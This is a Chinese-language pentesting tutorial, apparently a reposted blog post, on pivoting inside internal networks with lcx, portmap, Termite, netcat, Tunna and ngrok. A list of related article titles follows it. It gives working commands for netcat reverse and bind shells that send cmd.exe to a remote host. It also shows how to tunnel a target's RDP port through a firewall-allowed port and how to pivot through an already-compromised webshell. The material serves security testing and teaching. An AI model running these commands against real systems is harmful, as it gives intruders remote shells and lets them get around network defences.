內網中的埠轉發
參考文獻:http://payloads.online/archivers/2018-02-02/1
http://www.freebuf.com/articles/web/170970.html
工具下載:https://github.com/Brucetg/Pentest-tools
使用埠轉發技術來訪問內網其他主機中,或者將內網中某個埠轉發到本地。
埠對映 :
埠對映是將一臺主機的內網(LAN)IP地址對映成一個公網(WAN)IP地址,當使用者訪問提供對映埠主機的某個埠時,伺服器將請求轉移到本地區域網內部提供這種特定服務的主機。
1.lcx
-listen <監聽埠> <轉發埠>
-tran<監聽埠> <目標地址> <目標埠>
-slave <目標主機> <目標埠> <本地主機><本機埠>
埠對映 (無法訪問內網)
A(192.168.x.xx)無法訪問B( 172.21.xx.xx)主機上的埠,但B可以訪問外網
實現內網埠轉發
//在A主機上監聽兩個埠,並將來自 8989埠的請求傳送給9898埠
A主機上執行命令:lcx.exe -listen 8989 9898
//將B主機的3389埠轉發到A主機的8989埠
B主機上執行命令:lcx.exe -slave 192.168.x.xx 8989 172.21.xx.xx 3389
linux使用方式
./portmap -m 2 -p1 8989 -p2 9898
./portmap -m 3 -h1 內網主機IP -p1 3389 -h2 公網主機ip -p2 8989
A與B建立一個通道,將9898的資料不斷的傳送到B上的目標埠,中間也包括B主機目標埠響應的資料
埠轉發 (能夠訪問內網某臺主機)
①A能訪問B主機的任何埠,但是無法訪問C主機上的埠
實現埠轉發
//B主機上監聽的埠就相當於訪問了C主機上的埠
在B主機上執行:lcx.exe -tran {監聽埠} {C主機IP地址} {C主機埠}
②由於防火牆限制,部分埠無法通過防火牆
實現本地埠轉發
//將該B主機的無法通過防火牆的3389埠透傳到防火牆允許的其他埠53
B主機上執行:lcx -tran 53 B主機ip 3389
2. Termite
這個以前總結過,就不再細說了,直接看此文章就行了https://www.jianshu.com/p/cdaf50bfe6e1
3.nc反彈
①反向連線:
//在公網主機上進行監聽:
nc -lvp 9999
//在內網主機上執行:(-t 引數是指通過telnet模式執行cmd.exe)
nc.exe -t -e cmd.exe 192.168.8.140 9999
成功後得到一個內網主機的cmd shell
②正向連線
//遠端主機上執行:
nc -l -p 4444 -t -e cmd.exe
//本地主機上執行:
nc -vv 遠端主機ip 4444
成功後得到了一個遠端主機的一個cmd shell。
4.tunna
Tunna通過HTTP協議建立一個TCP通訊隧道,屬於埠複用技術。它可以用來繞過防火牆環境中的網路限制。
--help, -h 顯示此幫助資訊並退出
--url=URL, -u URL 為遠端webshell的URL
--lport=LOCAL_PORT, -l LOCAL_PORT代表本地偵聽埠
--verbose, -v 詳細(輸出資料包大小)
--buffer=BUFFERSIZE, -b BUFFERSIZE* HTTP請求大小(一些網站對大小有限制)
--no-socks, -n 不使用 Socks 代理
--rport=REMOTE_PORT, -r REMOTE_PORT遠端服務埠,供webshell連線
--addr=REMOTE_IP, -a REMOTE_IP 遠端webshell連線到的地址(預設為 127.0.0.1)
--ping-interval=PING_DELAY, -q PING_DELAY webshprx pinging執行緒間隔(預設值為0.5)
--start-ping, -s 首先啟動ping執行緒 - 一些服務首先傳送資料(例如,SSH)
--cookie, -C 請求cookies
--authentication, -t 基本認證
A已經擁有了B主機的Webshell,但是無法對B主機的其他埠進行通訊
//將目標伺服器的3389埠轉發到本地的1234埠
python proxy.py -u {WebShell地址} -l 1234 -r 3389 -v -n -s
//將10.10.12.1伺服器的3389埠轉發到本地的1234埠
python proxy.py -u {WebShell地址} -l 1234 -r 3389 -a 10.10.12.1 -v -n -s
5.ngrok
訪問內網上的內容
//在本機上執行
python2 -m SimpleHTTPServer 80
//在內網主機上執行
`/home/cws6/Desktop/ngrok` http 80
在本機瀏覽器中訪問Forwarding
後的網址,就能訪問內網主機上的檔案。
相關文章
- 內網埠轉發小技巧內網
- 內網入口——代理搭建&埠轉發內網
- 4、內網埠轉發及穿透(合集)內網穿透
- 2、Web狗要懂的內網埠轉發Web內網
- 內網小組 | 埠轉發 全劇終內網
- 利用nginx的stream模組實現內網埠的轉發代理Nginx內網
- [ssh訪問內網伺服器]使用Natapp來進行內網埠轉發內網伺服器APP
- vbox配置nat網路的埠轉發
- 5、內網滲透之埠轉發與代理工具總結內網
- vbox 網路地址轉換(NAT) 埠轉發
- 用 IPTABLES 的埠轉發功能實現訪問位於內網的 MySQL 伺服器內網MySql伺服器
- 玩轉SSH埠轉發
- 內網滲透—流量轉發內網
- virtualbox實現區域網內訪問虛擬機器2-network新增埠轉發虛擬機
- Win10 埠轉發Win10
- Linux-Windows 埠轉發LinuxWindows
- ssh埠轉發(ssh隧道)
- iptables 配置埠及轉發
- 帶內串列埠 在串列埠中輸入命令串列埠
- 內網滲透-隧道代理轉發內網
- 內網穿透之流量代理轉發內網穿透
- 內網穿透教程,簡單,便捷,極速穿透內網埠內網穿透
- Linux埠轉發的幾種常用方法Linux
- Windows 上使用 PowerShell 設定防火牆規則和埠轉發; Windows 上配置埠轉發,將 3389 埠的流量重定向到自定義埠;Windows防火牆
- 什麼是SSH埠轉發(本地轉發、遠端轉發、動態轉發)?
- 1、實戰SSH埠轉發
- squid 代理轉發內網伺服器UI內網伺服器
- 網路埠地址轉換 NAPT 配置APT
- 在Linux中,如何將本地80埠的請求轉發到8080埠,當前主機IP為192.168.16.1,其中本地網路卡eth0。Linux
- 在 Fedora 上使用 SSH 埠轉發
- 劫持SSH會話注入埠轉發會話
- 7、Linux 埠轉發特徵總結Linux特徵
- 8、SSH埠轉發情景模擬
- 在Linux中,如何將本地 80 埠的請求轉發到 8080 埠?當前主機 IP 為10.0.0.104。Linux
- 滲透測試基礎--內網轉發內網
- Netweaver的埠號和Spring boot內嵌的Tomcat埠Spring BootTomcat
- 如何用nginx在本地把9000埠轉發到80埠上Nginx
- 設定 SSH 隧道(埠轉發)實戰